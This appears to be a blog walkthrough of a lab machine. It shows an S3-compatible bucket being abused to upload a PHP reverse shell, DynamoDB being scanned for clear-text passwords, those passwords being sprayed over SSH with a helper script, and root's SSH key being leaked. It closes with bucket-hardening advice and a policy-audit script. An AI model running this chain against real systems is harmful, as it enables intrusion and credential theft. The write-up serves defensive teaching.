Amazon AWS anti-data-leak guidance 2021
The AWS S3 cloud service now holds more than 100 trillion objects, and Amazon designs it for 99.999999999% (eleven nines) object durability. Durability, however, only says that data will not be lost; it says nothing about who is allowed to read or write it, which is what the rest of this article is about. Large companies such as Netflix, Twitch and the BBC use Amazon S3 to store their data in the cloud.
In this article, we will:
- analyse vulnerabilities related to S3 buckets
- show in detail how a machine running AWS-compatible services can be compromised through a misconfigured bucket
- list protection measures recommended by Amazon and by us to keep your data safe in the cloud.
Disclaimer: The attack replicated in this article was performed on a machine in a safe environment built especially for this purpose. Please do not attack any system without its owner's written consent.
Amazon S3 Bucket Vulnerability
I will show you how I replicated an attack that abuses the file upload (PutObject) feature of an Amazon S3-compatible bucket.
I first installed the AWS CLI (Command Line Interface) on my Kali Linux machine with the command:
sudo apt install awscli
I then attempted to connect to a custom endpoint and list the buckets it serves (with no path, s3 ls lists buckets rather than objects):
aws --endpoint-url http://s3.bucket.htb s3 ls
However, the CLI refuses to send any request until credentials are configured. They are set with:
aws configure
When prompted, leaving every field blank does not work. But any non-empty access key and secret key (and any region) are accepted: this S3-compatible endpoint does not validate the credentials used to sign the request. A real AWS endpoint checks the signature against the account's keys and rejects invalid ones, so this step is itself the first misconfiguration.
We issue the previous s3 ls command again, and now it works: we are connected to the endpoint and can list its buckets.
Now we abuse the upload feature by placing a reverse shell in the bucket; the shell connects back to us when it is executed.
A reverse shell is a command, or a collection of commands, that makes a remote machine open a connection to our machine. We make the target connect to us by uploading a file that runs these commands when the web server serves it.
On Kali Linux, such reverse shells are already on your machine in the directory /usr/share/laudanum/php. On another Linux distribution, you can download the reverse shell from PentestMonkey.
Before using the file, you must change the IP address and the port it connects back to. You can find your IP with ifconfig (or ip a). I used port 443, which is rarely blocked by outbound filtering. The parameters to change are marked with comments in the file (CTRL+F finds them quickly).
We then upload the file into the bucket with the cp (copy) command, choosing the object key rev.php:
aws --endpoint-url http://s3.bucket.htb s3 cp reverse_shell.php s3://adserver/rev.php
You should get a line back confirming the upload location.
We set up the Netcat listener. The machine will connect to us on port 443, so we must be listening there to receive the connection:
sudo nc -nlvp 443
We now browse to our uploaded file so that the web server executes it. Because the website is served from the bucket's contents, the file is reachable at the website's URL followed by '/' and the object key we chose, rev.php.
After requesting it, we check the terminal and see that we have a shell.
We can now type commands on the machine hosting the server.
We are a low-privilege user, www-data. However, this does not mean that the vulnerability has a small impact: there are many ways in which we can escalate our privileges, and the endpoint itself gives us the first one.
Before continuing with this shell, I will show you some other commands you can run against the same endpoint, which also serves DynamoDB with the same absent credential check. Using the following command, we list the tables in the database:
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables
We see that the database contains the table "users". Describing the table shows its key schema, and scanning it dumps every item, which here includes the users and their clear-text passwords:
aws --endpoint-url http://s3.bucket.htb dynamodb describe-table --table-name users
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users
Going back to our initial shell, we need to find the local users of the machine. They do not have to match the usernames in the database; however, password reuse is common, so the passwords we found may still be valid for local accounts.
ls -la /home
We see the user roy. To get a more stable shell (and to show SSH on this machine), we connect over SSH and try each password from the database against roy. The last one works, and we are connected as roy!
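The output of aws dynamodb scan is not a flat list of credentials: every attribute is wrapped in a DynamoDB type descriptor such as {"S": "..."} or {"N": "..."}. The following added example (my own code, not from the original article) flattens a scan result and builds the (local user, password) pairs to try over SSH, in the order the text suggests: exact username matches first, then every distinct password against every local account. The scan output, the usernames alice, bob and svc_backup and the passwords are constructed for this example; the local user roy comes from the walkthrough above.

```python
"""Turn `aws dynamodb scan` output into SSH credential candidates.

DynamoDB JSON wraps each attribute in a type descriptor ({"S": ...} for
strings, {"N": ...} for numbers, {"M": ...} for maps, ...), so the result of
`aws dynamodb scan --table-name users` has to be unwrapped before the
username/password pairs can be used for a password-reuse check.
"""
import json

# Constructed sample in the shape the AWS CLI returns for a scan. All values
# are made up for this example and do not come from any real system.
SAMPLE_SCAN_OUTPUT = json.dumps({
    "Items": [
        {"username": {"S": "alice"}, "password": {"S": "Winter2021!"}},
        {"username": {"S": "svc_backup"}, "password": {"S": "backup#1"}},
        {"username": {"S": "bob"}, "password": {"S": "Winter2021!"},
         "uid": {"N": "1002"}},
    ],
    "Count": 3,
    "ScannedCount": 3,
    "ConsumedCapacity": None,
})


def unwrap(value):
    """Convert one DynamoDB attribute value to a plain Python value."""
    (kind, inner), = value.items()          # each attribute has exactly one type key
    if kind == "S":
        return inner
    if kind == "N":                          # numbers are transported as strings
        return int(inner) if inner.lstrip("-").isdigit() else float(inner)
    if kind in ("BOOL", "NULL"):
        return inner if kind == "BOOL" else None
    if kind == "L":
        return [unwrap(v) for v in inner]
    if kind == "M":
        return {k: unwrap(v) for k, v in inner.items()}
    if kind in ("SS", "NS"):
        return list(inner)
    raise ValueError(f"unsupported DynamoDB type {kind}")


def flatten_scan(scan_json):
    """Return the Items of a scan as plain dicts, one per row."""
    data = json.loads(scan_json)
    return [{k: unwrap(v) for k, v in item.items()} for item in data.get("Items", [])]


def credential_candidates(items, local_users, user_key="username", pass_key="password"):
    """Build (local_user, password) pairs to try over SSH.

    Database and OS usernames need not match, but passwords are often reused,
    so every distinct password is tried against every local account. Local
    accounts whose name also appears in the table are tried first.
    """
    passwords = []
    for item in items:
        pw = item.get(pass_key)
        if isinstance(pw, str) and pw not in passwords:
            passwords.append(pw)
    db_users = {item.get(user_key) for item in items}
    ordered_users = ([u for u in local_users if u in db_users]
                     + [u for u in local_users if u not in db_users])
    return [(u, p) for u in ordered_users for p in passwords]


if __name__ == "__main__":
    rows = flatten_scan(SAMPLE_SCAN_OUTPUT)
    # "roy" is the local user found under /home in the walkthrough; "alice" is
    # a constructed local account that also exists in the table.
    for user, pw in credential_candidates(rows, ["roy", "alice"]):
        print(f"ssh {user}@<target>   # try password: {pw}")
```

Only the distinct passwords are tried, and the loop stops being a guess the moment one succeeds; on a real engagement, keep the attempt count low enough not to trip account lockout or fail2ban on the target.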
Now, to gain full control of the system, we use the DynamoDB endpoint one more time.
We create a table named alerts:
aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
        AttributeName=data,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
        AttributeName=data,KeyType=RANGE \
    --provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \
    --endpoint-url http://s3.bucket.htb
With the table in place, we trigger the internal service listening on 127.0.0.1:8000 (this and the next command run from our SSH session as roy, since the port is bound to localhost). A POST with action=get_alerts makes it process the alerts table and write its result to a PDF:
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000
The generated PDF contains root's SSH private key from the directory /root/.ssh. We download it with curl:
curl http://127.0.0.1:8000/files/result.pdf -o ./result.pdf
We open result.pdf and find the RSA private key.
We save the key to a file named id_rsa and restrict its permissions; SSH refuses to use a private key that other users can read.
chmod 400 id_rsa
ssh -i id_rsa root@<target>
(Replace <target> with the machine's hostname or IP address.)
And we have gained full access to the machine. The chain began with an S3-compatible endpoint that accepted any credentials, a bucket that allowed unauthenticated writes and was served as the web root, and a DynamoDB table holding clear-text passwords; each of these is a configuration mistake rather than a flaw in S3 itself.
What is Amazon S3?
Amazon Simple Storage Service, or Amazon S3, is a service offered by Amazon Web Services (AWS) built to offer object storage on the Cloud. Amazon promises:
- data availability
A bucket is a resource on an AWS S3 endpoint. It is a container, similar to a folder, that stores objects (a file plus its metadata). Unlike a folder, every bucket has its own access controls, which is why a single misconfigured bucket can expose everything in it.
According to a trusted source, AWS's top users include huge companies like Netflix, Twitch, LinkedIn, Facebook, BBC, Adobe, Twitter, etc.
To protect your AWS S3 bucket and keep intruders out of your storage space, you can use the following features provided by Amazon:
- Turn on Block Public Access at the bucket level (and at the account level); it overrides any ACL or bucket policy that would otherwise make objects public.
- Use bucket ACLs to remove read, write and permission-management grants from the 'Everyone' (AllUsers) group and from 'Authenticated users' (AuthenticatedUsers), which means any AWS account, not just yours. AWS now recommends disabling ACLs entirely (Object Ownership set to 'bucket owner enforced') and expressing all access in bucket policies.
- Inventory your buckets with the ListBuckets API, then check each one's public status with GetBucketPolicyStatus (or IAM Access Analyzer for S3) instead of assuming a bucket is private.
- Implement bucket policies that do not let everyone access the bucket or perform actions on it (note: a Principal of "*" means anyone, including unauthenticated requests from the internet). In particular, never grant s3:PutObject to "*"; that is exactly what let the reverse shell above be uploaded.
- Encrypt your data. Amazon supports HTTPS, which encrypts data in transit, and you can reject plain HTTP with a Deny statement on the aws:SecureTransport condition; server-side encryption (SSE-S3 or SSE-KMS) protects data at rest.
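The two policy points above (no "*" Principal in an Allow statement, and a Deny for non-TLS requests) are easy to check mechanically. The following added example (my own code, not from the original article or from AWS) audits a bucket policy document for statements open to everyone and produces a hardened copy that drops them and appends the TLS-enforcing Deny. The policy, the bucket name example-adserver, the account ID 123456789012 and the role name adserver-app are constructed placeholders.

```python
"""Audit an S3 bucket policy for public access and produce a hardened version.

A statement grants access to everyone when its Effect is Allow, its Principal
is "*" (or {"AWS": "*"}) and no Condition narrows who may call it. The
hardened policy keeps the application's own access and adds a Deny for any
request that is not made over TLS (aws:SecureTransport = false).
"""
import json
from copy import deepcopy

# Constructed example with the classic mistake: anonymous read AND write.
WEAK_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicReadWrite", "Effect": "Allow", "Principal": "*",
         "Action": ["s3:GetObject", "s3:PutObject"],
         "Resource": "arn:aws:s3:::example-adserver/*"},
        {"Sid": "AppAccess", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/adserver-app"},
         "Action": ["s3:GetObject", "s3:PutObject"],
         "Resource": "arn:aws:s3:::example-adserver/*"},
    ],
}


def _is_wildcard_principal(principal):
    """True for the three spellings of 'anyone': "*", {"AWS": "*"}, {"AWS": [..., "*"]}."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False


def _is_public(stmt):
    # A Deny with Principal "*" is fine (that is how TLS is enforced); only
    # unconditional Allow statements to everyone make the bucket public.
    return (stmt.get("Effect") == "Allow"
            and _is_wildcard_principal(stmt.get("Principal"))
            and not stmt.get("Condition"))


def public_statements(policy):
    """Return the Sids of Allow statements that are open to everyone."""
    return [s.get("Sid", "<no Sid>") for s in policy.get("Statement", []) if _is_public(s)]


def harden(policy, bucket_arn):
    """Return a copy with public Allow statements removed and a TLS-only Deny added."""
    hardened = deepcopy(policy)
    hardened["Statement"] = [s for s in hardened.get("Statement", []) if not _is_public(s)]
    hardened["Statement"].append({
        "Sid": "DenyInsecureTransport",
        "Effect": "Deny",
        "Principal": "*",                     # applies to every caller, including the app role
        "Action": "s3:*",
        "Resource": [bucket_arn, f"{bucket_arn}/*"],
        "Condition": {"Bool": {"aws:SecureTransport": "false"}},
    })
    return hardened


if __name__ == "__main__":
    print("public statements:", public_statements(WEAK_POLICY))
    print(json.dumps(harden(WEAK_POLICY, "arn:aws:s3:::example-adserver"), indent=2))
```

Run it against the policy fetched with aws s3api get-bucket-policy and apply the output with put-bucket-policy. Note that the check is deliberately conservative: a statement with a Condition is not reported even though some conditions (for example aws:SourceIp with 0.0.0.0/0) are still effectively public, so it complements Block Public Access and GetBucketPolicyStatus rather than replacing them.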
I have prepared an infographic where you can see statistics about the Amazon S3 cloud storage platform. Please read the protection measures carefully and apply them to keep your private data safe!
Considering the demonstration in this article, take great care of your cloud storage and apply all the security measures that Amazon and I recommend.
It matters because, as shown above, a misconfigured storage endpoint let an attacker take over the machine hosting it, and the damage can extend to your or your company's data.
If you use Amazon S3, let me know whether you have heard of other vulnerabilities and which protection measures you take to keep your private data safe.
Stay tuned and watch around!